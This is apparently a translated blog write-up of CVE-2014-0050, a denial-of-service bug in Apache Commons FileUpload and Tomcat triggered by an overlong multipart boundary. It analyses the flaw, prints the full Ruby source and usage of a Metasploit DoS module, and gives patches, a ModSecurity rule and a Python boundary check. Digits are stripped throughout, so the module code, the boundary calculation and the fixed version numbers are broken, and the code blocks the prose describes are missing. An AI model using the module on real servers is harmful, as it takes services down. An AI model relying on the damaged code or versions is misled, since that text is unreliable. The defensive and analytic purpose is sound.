catalog

. Description
. Analysis
. POC
. Solution

1. Description

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.
The MultipartStream.java file in Apache Commons FileUpload 1.3.1 and earlier, as used in Apache Tomcat and JBoss Web, contains a security vulnerability. A remote attacker can exploit it with a crafted Content-Type header to cause a denial of service (infinite loop and CPU consumption).

Relevant Link:

http://cve.scap.org.cn/CVE-2014-0050.html
https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2014-0050
http://www.cnblogs.com/geekcui/p/3599425.html

2. Analysis

The original HTTP protocol had no file-upload capability; RFC 1867 (http://www.ietf.org/rfc/rfc1867.txt) added it. Client browsers such as Microsoft IE, Mozilla and Opera follow this specification to send the user's chosen file to the server, and server-side web programs (PHP, ASP, JSP and so on) parse the uploaded file according to the same specification.
A typical multipart/form-data upload request looks like this:

POST /upload_file/UploadFile HTTP/1.1
Accept: text/plain, */*
Accept-Language: zh-cn
Host: 192.168.29.65:80
Content-Type: multipart/form-data; boundary=---------------------------7d33a816d302b6
User-Agent: Mozilla/4.0 (compatible; OpenOffice.org)
Content-Length: 424
Connection: Keep-Alive

-----------------------------7d33a816d302b6
Content-Disposition: form-data; name="userfile1"; filename="E:\s"
Content-Type: application/octet-stream

abbXXXccc
-----------------------------7d33a816d302b6
Content-Disposition: form-data; name="text1"

foo
-----------------------------7d33a816d302b6
Content-Disposition: form-data; name="password1"

bar
-----------------------------7d33a816d302b6--

As the example shows, the multipart/form-data body is split into parts by the boundary, and the boundary's value is supplied by the client in the HTTP Content-Type header.

0x1: Vulnerable code analysis

/commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/MultipartStream.java


The fixed code has an extra "if" condition (line number 330) that validates the length of the multipart boundary to be shorter than 4091 characters, raising an exception if that's not the case. The calculation is as follows:

boundary.length > bufSize –  – BOUNDARY_PREFIX.length =  –  –  =
Parts of this code were copied into the org.apache.tomcat.util.http.fileupload package in Apache Tomcat, so Tomcat is affected as well.

0x2: Creating the exploit

So let's get Apache Tomcat installed and try to send more than 4091 characters in the boundary field to the Apache Tomcat Manager application. Such a request might look like this:

0x3: Why is this happening

While parsing the multipart message, the following "for" loop is used by the MultipartStream class:

The innocent-looking "for" loop above is an endless loop, a close relative of the familiar "while(true)" loop. The developer's intention was to leave it either by raising an exception (line 1003) or by returning a value (line 1014); unfortunately, when the boundary is longer than 4091 characters (as explained earlier) and the body is longer than 4096 characters (so it can potentially contain the boundary), neither ever happens.

Relevant Link:

https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/

3. POC

0x1: Metasploit

msf > use auxiliary/dos/http/apache_commons_fileupload_dos
msf auxiliary(apache_commons_fileupload_dos) > show actions
...actions...
msf auxiliary(apache_commons_fileupload_dos) > set ACTION <action-name>
msf auxiliary(apache_commons_fileupload_dos) > show options
...show and set options...
msf auxiliary(apache_commons_fileupload_dos) > run

0x2: apache_commons_fileupload_dos.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
      'Description' => %q{
        This module triggers an infinite loop in Apache Commons FileUpload 1.0
        through 1.3 via a specially crafted Content-Type header.
        Apache Tomcat and Apache Tomcat use a copy of FileUpload to handle
        mime-multipart requests, therefore, Apache Tomcat 7.0. through 7.0.
        and 8.0.-RC1 through 8.0. are affected by this issue. Tomcat also
        uses Commons FileUpload as part of the Manager application.
      },
      'Author' =>
        [
          'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
          'ribeirux' # metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2014-0050'],
          ['URL', 'http://tomcat.apache.org/security-8.html'],
          ['URL', 'http://tomcat.apache.org/security-7.html']
        ],
      'DisclosureDate' => 'Feb 6 2014'
    ))

    register_options(
      [
        Opt::RPORT(),
        OptString.new('TARGETURI', [ true, "The request URI", '/']),
        OptInt.new('RLIMIT', [ true, "Number of requests to send",])
      ], self.class)
  end

  def run
    boundary = ""*
    opts = {
      'method' => "POST",
      'uri' => normalize_uri(target_uri.to_s),
      'ctype' => "multipart/form-data; boundary=#{boundary}",
      'data' => "#{boundary}00000",
      'headers' => {
        'Accept' => '*/*'
      }
    }

    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
    # This should be rewritten with .upto() or Enumerable#each or
    # something
    for x in ..datastore['RLIMIT']
      print_status("Sending request #{x} to #{peer}")
      begin
        c = connect
        r = c.request_cgi(opts)
        c.send_request(r)
        # Don't wait for a response
      rescue ::Rex::ConnectionError => exception
        print_error("#{peer} - Unable to connect: '#{exception.message}'")
        return
      ensure
        disconnect(c) if c
      end
    end
  end
end

Relevant Link:

https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_dos
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb

4. Solution

0x1: Defend yourself

. Once available, update your software to one of the following versions:
Apache Commons FileUpload 1.3.
Apache Tomcat 7.0.
Apache Tomcat 8.0.
. You may choose to apply the appropriate patch:
Apache Commons FileUpload: http://svn.apache.org/r1565143
Apache Tomcat : http://svn.apache.org/r1565163
Apache Tomcat : http://svn.apache.org/r1565169

0x2: ModSecurity Commercial Rule Set

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"
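As an added example (not code from this page, the Trustwave post or the FileUpload library), here are the two defences this page describes written out in Python: the boundary-length check that the fixed MultipartStream performs, and the ModSecurity rule above, both run over constructed Content-Type headers. It assumes the library's default 4096-byte buffer and the four-byte CRLF-- prefix it prepends to the boundary, which together yield the 4091-character limit cited in the analysis section.

```python
import re

# Assumption (mirrors MultipartStream's defaults, not figures on this page):
# a 4096-byte read buffer and the CRLF-- prefix prepended to the boundary.
DEFAULT_BUFSIZE = 4096
BOUNDARY_PREFIX = b"\r\n--"
# The 1.3.1 check: prefixed boundary plus one byte must fit in the buffer,
# which gives the page's 4091-character limit.
MAX_BOUNDARY_LEN = DEFAULT_BUFSIZE - 1 - len(BOUNDARY_PREFIX)

# The page's ModSecurity rule: block any Content-Type of 4000+ characters.
MODSEC_RE = re.compile(r".{4000}")
_BOUNDARY_RE = re.compile(r'boundary=(?:"([^"]*)"|([^;\s]*))', re.IGNORECASE)


def extract_boundary(content_type):
    """Return the boundary parameter of a multipart Content-Type, else None."""
    if not content_type.strip().lower().startswith("multipart/"):
        return None
    m = _BOUNDARY_RE.search(content_type)
    if m is None:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def boundary_fits_buffer(content_type):
    """True when a default-size MultipartStream buffer can hold the boundary."""
    boundary = extract_boundary(content_type)
    if boundary is None:
        return True  # not multipart: MultipartStream never parses it
    # A boundary longer than this can never be matched, which is what leaves
    # the vulnerable parser's search loop without an exit. RFC 2046 boundaries
    # are ASCII, so character count equals byte count.
    return len(boundary) <= MAX_BOUNDARY_LEN


def modsec_rule_matches(content_type):
    """True when the page's SecRule would block this header."""
    return MODSEC_RE.search(content_type) is not None


# Constructed sample headers, not captured traffic.
BENIGN = "multipart/form-data; boundary=---------------------------7d33a816d302b6"
LIMIT = "multipart/form-data; boundary=" + "A" * MAX_BOUNDARY_LEN
OVERLONG = "multipart/form-data; boundary=" + "A" * (MAX_BOUNDARY_LEN + 1)

if __name__ == "__main__":
    for label, ct in (("benign", BENIGN), ("4091", LIMIT), ("4092", OVERLONG)):
        print(label, boundary_fits_buffer(ct), modsec_rule_matches(ct))
```

Note that the WAF rule is coarser than the library fix: it measures the whole header rather than the boundary, so it also blocks some requests the patched parser would accept.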

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) 2015 Little5ann All rights reserved
